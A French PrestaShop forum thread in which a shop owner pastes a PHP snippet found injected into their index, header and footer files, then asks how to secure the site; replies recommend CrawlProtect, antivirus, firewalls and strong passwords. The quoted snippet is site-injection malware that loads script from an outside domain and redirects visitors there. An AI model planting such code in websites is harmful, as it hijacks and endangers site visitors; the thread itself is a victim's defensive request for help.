Jump to content

Protéger un site prestahop

Rdev

By Rdev
in Discussion générale

 Share

Recommended Posts

Rdev Newbie

Rdev

Posted
Posted

Bonjour,

 

Hier j'ai ce message d'erreur dans la page d'accueil du mon site

Parse error: syntax error, unexpected '<' in /xxx/xxx/www.index.php on line 31

et j'ai trouvé ce script dans les fichiers (index.php, header.ph et footer.php)

<?
#560dc7#
if(empty($iemgz)) {
$iemgz = "<script type=\"text/javascript\">var gwloaded = false;</script>
    <script src=\"http://verification.mvpitsolutions.com/lander/Password%20Page_files/gwjs.js\" type=\"text/javascript\"></script>
    <script type=\"text/javascript\">if (gwloaded==false){window.location = \"http://verification.mvpitsolutions.com/lander/AdBlock%20Must%20be%20Disabled%20to%20View%20This%20Content.html\";}</script>
<noscript><meta http-equiv=\"refresh\" content=\"0;url=http://verification.mvpitsolutions.com/lander/JavaScript%20Required.html\" /></noscript>";
echo $iemgz;
}

#/560dc7#
?>

j'ai supprimé les scripts des ses fichiers et le site fonctionne

 

mais je veux savoir comment je peux protéger mon site

 

qui peut m'aider et merci

Link to comment
Share on other sites
Paul MONFILS Newbie

Paul MONFILS

Posted
Posted

Ensuite, vous pouvez verrouiller votre PS avec Crawlprotect

 

oui, et j'ajouterai que CrawlProtect étant un script de sécurisation, il y aura des interractions avec votre boutique. Pas de panique c'est normal puisque la sécurité repose notamment sur le fichier .htaccess. Donc ne vous inquiétez pas si Prestashop ne pourra plus générer de nouveau fichier .htaccess après l'installation de CrawlProtect. Pour permettre à Prestashop de générer un nouveau fichier .htaccess ce sera  soit via votre client FTP soit via l'espace de gestion de CrawlProtect.

Link to comment
Share on other sites
Rdev Newbie

Rdev

Posted
  • Author
Posted (edited)

le message d'erreur lors de la tentative de connexion FTP est

Statut :	Résolution de l'adresse de moscoodev.com
Statut :	Connexion à 91.121.55.79:21...
Statut :	Connexion établie, attente du message d'accueil...
Erreur :	Impossible d'établir une connexion au serveur
Réponse :    421 Timeout - try typing a little faster next time
Erreur :    Déconnecté du serveur : ECONNABORTED - Connection aborted
Edited by radhia005 (see edit history)
Link to comment
Share on other sites
Oron Rookie

Oron

Posted
Posted

Bonjour

 

Rhoooo encore sur le dos de filezilla, il stocke en clair que sur votre pc, vous pouvez aussi vous connecter en mode sécurisé avec filezilla.

 

Avant de tout mettre sur le dos de filezilla, sécurisé votre PC que ce soit sopus windows Mac Linux ou autre.

Un anti-virus qui contrôle le disque, les e-mails et les sites web que vous visitez, pour garantir ces 3 fonctions faut investir un peu dans un antivirus.

 

Autre point un bon firewall qui vous protège des accès entrant sur votre poste et sortant de vos logiciels.

Celui de windows par défaut ne vous protège pas bien.

 

Utilisez aussi un anti malware et faites des analyses en fond de tâche. Et une fois par mois une analyse complète de votre poste mais sans travailler dessus.

 

Faites des mots de passe complexe minimum 8 caractères mélanger chiffre lettre majuscule lettre minuscule symbôle

 

Le dossier d'administration donnez lui un nom qui ne fait pas penser a un dossier d'administration.

 

Dans crawl protect et crawl track les deux se complètent, vous pouvez configurer pour qu'il ne vous bloque pas.

Si vous avez une IP fixe vous pouvez la mettre dans les exclusions pour qu'elle ne soit pas bloquer.

 

Pour accéder si votre poste est bloqué aller chez une personne de confiance ou utilisez un portable PC et aller vous connecter où l'ip sera différente de la votre.

 

Vous pouvez aussi accéder directement dans la base de donnée via phpmyadmin et débloquer vos IP

Si vous n'avez pas d'accès phpmyadmin (certaines bases chez ovh) vous pouvez installer un programme sur votre poste pour accéder à ma base de donnée.

 

Si vous demandez de l'aide à un prestataire ou autre que vous ne connaissez pas demander li d'abord de s'identifier nom prénom adresse téléphone siret ou N° rcs. s'il refuse de s'identifier fuyez.

Link to comment
Share on other sites
Yoya Newbie

Yoya

Posted
Posted

Fillezilla stock les pwds en clair car d'après eux "ça ne sert à rien de les crypter, les décrypteurs étant légion" et "ce n'est pas à eux de sécuriser votre PC Windows mais bien à l'utilisateur de celui ci et aux antivirus".

 

J'utilise Filezilla depuis des années sous Linux et je n'ai jamais rencontré ce problème étant bien protégé :)

 

Cdlt

Pierre

  • Like 1
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share
Go to topic listing
×
×
  • Create New...